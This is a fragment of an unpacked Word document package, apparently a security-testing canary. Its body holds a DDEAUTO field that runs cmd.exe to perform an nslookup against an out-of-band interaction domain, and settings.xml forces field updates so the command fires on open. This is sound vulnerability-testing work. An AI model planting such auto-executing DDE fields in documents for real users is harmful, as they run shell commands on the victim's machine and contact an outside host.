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>MSOBB Word Online DDEAUTO execution canary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin" w:dirty="true"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> DDEAUTO "C:\Windows\System32\cmd.exe" "/c nslookup dde.d9v52cq0o7doa9a1ejn0tw88esz77j64o.oast.live" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>MSOBB-DDE-NOT-EXECUTED</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr/>
  </w:body>
</w:document>
</file>

<file path=word/settings.xml><?xml version="1.0" encoding="utf-8"?>
<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:updateFields w:val="true"/>
</w:settings>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rIdSettings" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/>
</Relationships>
</file>